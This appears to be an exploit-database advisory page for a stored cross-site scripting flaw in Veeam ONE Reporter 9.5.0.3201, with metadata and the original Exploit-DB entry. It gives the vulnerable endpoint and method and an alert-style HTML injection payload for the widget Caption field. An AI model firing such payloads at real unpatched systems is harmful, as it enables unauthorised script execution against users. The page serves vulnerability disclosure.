header-logo
Suggest Exploit
vendor:
Veeam ONE Reporter
by:
Seyed Sadegh Khatami
8.8
CVSS
HIGH
Stored Cross-site Scripting
79
CWE
Product Name: Veeam ONE Reporter
Affected Version From: 9.5.0.3201
Affected Version To: 9.5.0.3201
Patch Exists: YES
Related CWE: N/A
CPE: a:veeam:veeam_one_reporter:9.5.0.3201
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Server 2016
2019

Veeam ONE Reporter – Stored Cross-site Scripting (Add/Edit Widget)

Veeam ONE Reporter is vulnerable to stored cross-site scripting. An attacker can inject malicious JavaScript code into the Caption field of the Add/Edit Widget page, which is stored in the database and executed when the page is viewed by an authenticated user.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016


#exploit:

Path: /CommonDataHandlerReadOnly.ashx 

method: setDashboardWidget

SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”

Navigation

Suggest Exploit

Services By CQR